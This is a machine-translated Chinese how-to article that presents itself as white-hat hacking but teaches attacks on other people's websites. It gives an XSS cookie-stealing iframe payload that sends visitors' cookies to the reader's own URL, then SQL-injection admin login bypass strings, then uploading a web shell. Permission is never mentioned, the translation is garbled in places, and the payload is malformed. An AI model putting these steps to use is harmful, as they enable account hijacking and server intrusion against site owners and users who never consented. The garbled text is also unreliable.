有些人認為所有黑客都有惡意,但事實并非如此!“白帽”黑客利用網站中的漏洞幫助網站所有者提高安全性。白帽黑客甚至可以成為你的職業!這篇 wikiHow 文章將教你作為白帽黑客入侵網站的兩種方法,給你一些示例代碼,并幫助你完善你的黑客技能。
方法1 使用跨站腳本
1 找到一個可以發布內容的易受攻擊的網站。留言板就是一個很好的例子。請記住,如果該站點不易受到跨站點腳本攻擊,那么這將不起作用。
2 去創建一個帖子。您需要在“帖子”中鍵入一些特殊代碼,這將捕獲所有點擊它的人的數據。
- 您需要測試一下系統是否過濾掉了代碼。郵政
- <script>window.alert("test")</script>
- 如果您單擊帖子時出現警告框,則該站點容易受到攻擊。
3 創建并上傳您的 cookie 捕手。此攻擊的目標是捕獲用戶的 cookie,它允許您訪問他們的帳戶以訪問具有易受攻擊登錄的網站。您將需要一個 cookie 捕捉器,它將捕獲目標的 cookie 并重新路由它們。將 catcher 上傳到您可以訪問的支持php的網站,并且容易通過上傳遠程執行代碼。示例 cookie 捕獲器代碼可以在示例部分中找到。
4 用你的餅干捕手張貼。在帖子中輸入正確的代碼,該代碼將捕獲 cookie 并將它們發送到您的站點。您需要在代碼后添加一些文本以減少懷疑并防止您的帖子被刪除。
- 示例代碼如下所示
<iframe frameborder="0" height="0" width="0" src="JAVAscript...:void(document.location='YOURURL/cookie catcher.PHP?c=' document.cookie)></iframe>
5 使用收集的 cookie。在此之后,您可以將 cookie 信息保存到您的網站,用于您需要的任何目的。
方法2 執行注入攻擊
1 查找易受攻擊的站點。由于易于訪問的管理員登錄,您將需要找到一個易受攻擊的站點。嘗試在您最喜歡的搜索引擎上搜索管理員登錄。asp 或管理員 login.php。
2 以管理員身份登錄。鍵入 admin 作為用戶名并使用幾個不同的字符串之一作為密碼。這些可以是幾個不同字符串中的任何一個,但一個常見的例子是 1'or'1'='1 or 2'='2。
3 要有耐心。這可能需要一些試驗和錯誤。
4 訪問網站。最終,您應該能夠找到一個允許您以管理員身份訪問網站的字符串,假設該網站容易受到攻擊。然后,以管理員身份登錄,您可以執行進一步的操作,例如上傳 Web shell 以獲得服務器端訪問權限(如果您可以執行文件上傳)。
方法3 為成功做好準備
1 學習一兩種編程語言。如果您想學習如何破解網站,您需要了解計算機和其他技術的工作原理。學習使用Python/ target=_blank class=infotextkey>Python、PHP(利用服務器端漏洞所必需的)或SQL等編程語言,以便更好地控制計算機并識別系統中的漏洞。
2 具備基本的html素養。如果你特別想破解網站,你還需要對 HTML 和 JavaScript 有很好的理解。這可能需要一些時間來學習,但是網上有很多免費的學習方式,所以如果你想學,你肯定會有機會。
3 咨詢白帽。白帽子是黑客,他們利用自己的力量為善,暴露安全漏洞,讓互聯網成為每個人都更好的地方。如果您想學習破解并永久使用您的權力,或者如果您想幫助保護您的網站,您可能需要聯系一些當前的白帽子尋求建議。
4 研究黑客。如果您想學習黑客或只是想保護自己,則需要進行大量研究。網站易受攻擊的方式有很多種,而且列表不斷變化,因此您需要不斷學習。
5 保持最新。由于可能的黑客攻擊列表不斷變化,并且發現了新的漏洞,因此您需要確保保持最新狀態。僅僅因為您現在免受某種類型的黑客攻擊并不意味著您將來會安全!
